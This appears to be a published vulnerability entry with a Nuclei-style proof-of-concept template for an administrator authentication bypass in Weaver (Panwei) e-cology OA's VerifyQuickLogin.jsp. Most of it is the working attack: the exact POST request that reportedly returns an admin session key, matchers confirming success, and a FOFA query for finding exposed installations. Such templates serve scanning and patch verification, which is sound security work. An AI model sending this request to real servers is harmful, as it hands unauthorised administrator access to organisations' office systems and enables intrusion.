漏洞描述
There is an arbitrary administrator login vulnerability in the Panwei OA E-Cology VerifyQuickLogin.jsp file. An attacker can obtain the administrator Session by sending a special request package.
ecology-verifyquicklogin-auth-bypass: Weaver e-cology verifyquicklogin.jsp - Auth Bypass
PoC代码[已公开]
id: ecology-verifyquicklogin-auth-bypass
info:
name: Weaver e-cology verifyquicklogin.jsp - Auth Bypass
author: SleepingBag945
severity: high
description: |
There is an arbitrary administrator login vulnerability in the Panwei OA E-Cology VerifyQuickLogin.jsp file. An attacker can obtain the administrator Session by sending a special request package.
reference:
- http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20VerifyQuickLogin.jsp%20%E4%BB%BB%E6%84%8F%E7%AE%A1%E7%90%86%E5%91%98%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E.html
classification:
cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: weaver
product: e-cology
fofa-query: app="泛微-协同办公OA"
tags: ecology,weaver,oa,auth-bypass,vuln
http:
- raw:
- |
POST /mobile/plugin/VerifyQuickLogin.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
identifier=1&language=1&ipaddress=x.x.x.x
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\"sessionkey\":"
- "\"message\":"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100dfcfd1a9579e4274ca54040be141d5bca04a568f1e15fd8c65d95a98ece043ab022040757437d1e0a4bbbd138c1c6a45688abc9357d85a61234220e2aafa7a9ed059:922c64590222798bb761d5b6d8e72950